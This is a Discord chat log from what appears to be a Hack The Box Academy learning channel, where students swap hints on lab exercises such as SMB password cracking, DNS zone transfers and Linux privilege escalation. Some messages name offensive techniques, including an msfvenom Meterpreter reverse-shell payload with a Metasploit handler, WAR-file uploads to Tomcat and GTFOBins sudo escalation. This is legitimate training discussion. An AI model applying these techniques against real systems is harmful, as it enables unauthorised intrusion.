not Staff in general

latent eagle
#

I am patient, it's just I understand this discord has lost alot of members and grown in mods, but mods are not around to help

#

Just something I have noticed

fathom pendant
#

And most mods are volunteers

#

the ones that also happen to be staff aren't employeed to be discord help

latent eagle
#

Huh? I was under the impression they were given HTB enterprise accounts

fathom pendant
#

no

#

they aren't LMAO

#

mods/admins by default are just volunteers

latent eagle
#

Then why the fuck would you mod for this server

#

Weeeeeew

fathom pendant
#

because you care about the community and want to see it grow positively

urban sage
fathom pendant
#

BUT YOUR POINT IS VALID

latent eagle
#

Any communities with nerds are bound to be horrific

fathom pendant
#

eh up until recently moderation was fairly consistent, then THE INCIDENT which i'm not gonna get into and has already been discussed ad nauseum

latent eagle
#

Sounds scandalous

fathom pendant
#

just decisions that people didn't agree with

latent eagle
#

I am not interested either way, just here for the Certs

fathom pendant
#

but again decisions nonetheless that we don't know about

fathom pendant
latent eagle
#

CPTS hashtag soon

#

3% left to do in the path

urban sage
fathom pendant
#

yeah

latent eagle
#

Must have been here for awhile...

#

Sr. work the same as real-life? 7 years of service?

fathom pendant
#

The first one I know of but wasn't here for was Goomba

#

but gonna stop now

latent eagle
#

Thank you @urban sage

urban sage
bold sinew
#

Evening all.

Module: Using Web Proxies > ZAP Scanner

I am struggling to find the vulnerability im meant to use here despite following the instructions in the thread. Im not sure if im blind or if im doing something wrong. Could someone give me a hint and what I should be looking for?

fathom pendant
#

It can take a bit to find it

#

note it will be a "CRITICAL" vulnerability

#

i think it took like 5-10 minutes to find it

fathom pendant
#

I think the first vuln I found wasn't what they were looking for so I just had to wait

shut quest
#

I could never get anything higher than a med when I did it, and I waited for the scans to finish.

bold sinew
#

disregard, figured it out

crimson moon
#

Is shells and payloads skills assessment module laggy or is it my machine?

latent eagle
#

The whole platform is laggy today

verbal dagger
coarse dove
#

The user is good but this is the full name not username

blissful elm
#

what does that number mean

vernal hamlet
#

hi guys

#

Hi Guys i need help some help
im trying to solve this question from htba password attacks (Find the user for the SMB service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer.) and i found the password and loged in to the smb and them cd to a share directory but i cant list its content i tried everythinggg !!

#

smb: > dir
NT_STATUS_ACCESS_DENIED listing *

#

i really need help

hexed lintel
vernal hamlet
#

i already found the creds i used hydra and carckmapexec but i cant list the connent of the shared folder

#

content *

hexed lintel
#

as shown in module

#

and dont stop even after getting correct creds

vernal hamlet
#

sure i will try it right now

vernal hamlet
hexed lintel
vernal hamlet
hexed lintel
#

can anyone give me hint on this one

haughty tree
#

I suggest skimming over this section again, the answer is there

hexed lintel
haughty tree
#

took me some brain power aswell

strange forge
#

attacking common applications. skill assessmet 2. any hints for enumerating nagios xi for password?

solid moth
#

why i keep getting this errors ? "Connection reset by peer"

#

is this a connection error ?

fiery berry
next bronze
#

skills assessment?

lavish mango
frozen mesa
#

Introduction To Splunk & SPL --> open the "Search & Reporting" application, and find through an SPL search against all 4624 events the account name that made the most login attempts within a span of 10 minutes. Enter it as your answer.

The query i've used:
||index=* sourcetype=WinEventLog:Security EventCode=4624
| bucket span=10m _time
| stats count by _time, Account_Name
| sort - count
| head 10||

But all accounts found this way dont seem to be the right answer. I've tried some scrolling and sorting but didnt get any other accountnames. Any hints?

molten skiff
#

Introduction To Malware Analysis: Skills Assessment. I can't figure out the answer to the last question. Tried following the hint and just not getting it. If anyone can help I'd be grateful. 🙂

leaden wharf
#

Hello world

tranquil axle
timber hatch
#

kind a stuck here...WINDOWS PRIVILEGE ESCALATION / Other Files
i want to analyze the plum.sqlite file of the notes app. but i can't change the execution policy and therefore can't analyze the file directly on the windows host. but i also can't get it to the linux host....

junior flicker
#

I'm working through the Footprinting module and am trying to get through the DNS exercises. I am down to the last one looking for the FQDN for the host with IP ending in 203 and can't find this host. I checked the hint and have tried almost all of the wordlists from SecLists with dnsenum. Anyone have any ideas on what I'm missing?

acoustic owl
timber hatch
junior flicker
junior flicker
timber hatch
acoustic owl
timber hatch
#

anybody?

cedar void
#

I was able to decode the cookie using the tool on CyberChef, but I am not sure why I am not getting the same value when I use the Burp Suite tool to try to decode the cookie.

https://academy.hackthebox.com/module/110/section/1055

" The /admin.php page uses a cookie that has been encoded multiple times. Try to decode the cookie until you get a value with 31-characters. Submit the value as the answer. "

muted kindle
timber hatch
#

WTF

#

3h lost with that shit

#

was a bug

#

thanks....

#

repair that module...

#

or that section: WINDOWS PRIVILEGE ESCALATION / Other Files

fiery berry
junior flicker
fathom pendant
#

Just try transferring to all of them.

junior flicker
fathom pendant
#

Yes

#

If you don't know. Just try all

#

If that doesn't work use tools

junior flicker
fathom pendant
#

So, much like trying to axfr to subdomains, you can iterate through a list of subdomains for the tool

junior flicker
fathom pendant
#

Perhaps

#

Always build your thinking from the ground up

junior flicker
fathom pendant
# junior flicker Okay . . .

Ok let's walk through this
First step; you zone transfer to base domain, and don't find the answer
Second step; you try transferring to subdomains you find
Third; tools to bruteforce

junior flicker
fathom pendant
junior flicker
calm abyss
#

hello i am doing Linux Local Privilege Escalation - Skills Assessment and i need help with the 5th flag, i got a web shell from the tomcat but i cannot make a reverse shell

dim wolf
calm abyss
dim wolf
#

it should be the authenticated code execution

#

if they don't work, you can always use msfvenom

calm abyss
calm abyss
calm abyss
dim wolf
calm abyss
dim wolf
#

oh i see the issue

#

for your msfvenom command, set the payload to a linux reverse tcp, like linux/x64/meterpreter/reverse_tcp

#

then try again with this payload in msfconsole

#

exploit/multi/handler

calm abyss
#

and no shell

dim wolf
#

you set the payload in the msfconsole?

#

oh i'm dumb i forgor

#

it should work t hen

faint rampart
#

You should check out the shells & payloads module
This is explained quite well there along with a cheatsheet

dim wolf
upper ruin
#

I have a question regarding the XSS module - Session hijacking section.
I found the cookie, where do I input it on the login.php?

calm abyss
dim wolf
#

i'm not sure what you mean by that

#

you upload the war file then you click on it, it doesn't load?

faint rampart
upper ruin
#

So there's an extension.

#

Alrighty, ty ser.

dim wolf
#

i had to look at ippsec's video again just to make sure i wasn't tripping

#

and i wasn't, i just forgot a step

hexed lintel
#

unable to crack .zip file
from password attack module

dim wolf
#

you just need to navigate to the JSP

plain coral
faint rampart
faint rampart
dim wolf
#

a war file

faint rampart
next bronze
faint rampart
#

and no need to extract the hash from the zip as well lol

#

spoilers.

dim wolf
#

why are you telling me about sudo

hexed lintel
calm abyss
dim wolf
#

i don't need to know any of that

#

that's for you to figure out not me

next bronze
dim wolf
#

also you're spoiling the module content

faint rampart
next bronze
#

just dont use a vm for hashcat shruge

faint rampart
#

Mine doesnt have much resources

faint rampart
next bronze
#

ah unfortunate

fathom pendant
#

@haughty cosmos first off don't dm without permission and second you won't find hacked accounts on this server as that's illegal, you can fuck off with your request and learn to read #rules and #welcome before interacting on servers

calm abyss
cosmic zenith
#

God morning everyone! I was hoping to get some direction on the Offshore Pro Lab? Not sure if this is the right chat. Thanks!

cosmic zenith
#

How do I verify my account?

dim wolf
dim wolf
#

you even pinged me with it

wanton idol
#

bro look at the gtfobin and run the sudo command and see if u get root lol

calm abyss
fathom pendant
#

"for some reason it doesn't work" likely means you're doing it wrong

#

but it also isn't an error

rustic sage
#

Happy to know that!

calm abyss
#

well i found the sh from the command in /usr/bin/sh and changed the command but still it doesent work, i get no root.

The path is different.

The original command doesent work the updated command doesent work.

I guess i miss something.

woven mauve
#

Guys how long do your nmap scans usually take?

hexed lintel
#

when i provide the wordlist , bruteforce doesnot work

#

but when i donot provide it works

#

why

wanton idol
rustic sage
#

for CTFs, doing faster can be good!

wanton idol
#

until it misses one port that is important 💀

next bronze
wanton idol
woven mauve
hexed lintel
next bronze
#

how many lines in the list

#

it should have 94k

calm abyss
hexed lintel
wanton idol
#

maybe look at config files tbh i forgot what i did lol i remember not doing it the intended route and still passing it

calm abyss
#

they changed a lot on the system thats why GFTObins doesent work straight out of the box

fathom pendant
#

it has nothing to do with changes on the system

#

I doubt they changed the lab environment that much to make the intended method invalid

calm abyss
#

than why sudo doesent work ?
Its a straight forward command

fathom pendant
#

sudo /path/to/binary <insert privesc part here>

dim wolf
#

i just finished the skills assessment

#

i think this all boils down to some kind of server issue

fathom pendant
dim wolf
#

or you are doing something wrong

fathom pendant
#

or that

#

¯_(ツ)_/¯

calm abyss
#

i am on a EU server

fathom pendant
#

then you might be doing something wrong

#

??

#

clyde is high

calm abyss
#

i guess i am doing something wrong

dim wolf
#

i deleted it

calm abyss
#

i saw the image

fathom pendant
dim wolf
#

no, it's already in PATH

fathom pendant
calm abyss
#

enough for today, i am tiered from work.

But i got further than yesterday

fathom pendant
#

i mean it's as simple as copy/paste yeah?

calm abyss
#

thanks for the help guys.

wanton idol
#

u can show us the command u did so we can see what u doing could be wrong

#

but till tmmr 🤷‍♂️

calm abyss
#

but still i was tomcat

#

i have saved steps, so i can continue tomorrow from the shell

#

and try again

fathom pendant
dim wolf
#

no

fathom pendant
#

i'd delete this still as it's spoiler

calm abyss
#

ok

dim wolf
#

i upgraded to python3 tty, idk if that has anything to do with it

fathom pendant
#

maybe?

#

¯_(ツ)_/¯

#

also pty not tty

calm abyss
#

hm... a clue

dim wolf
#

idk what the difference is

#

ok i know the difference now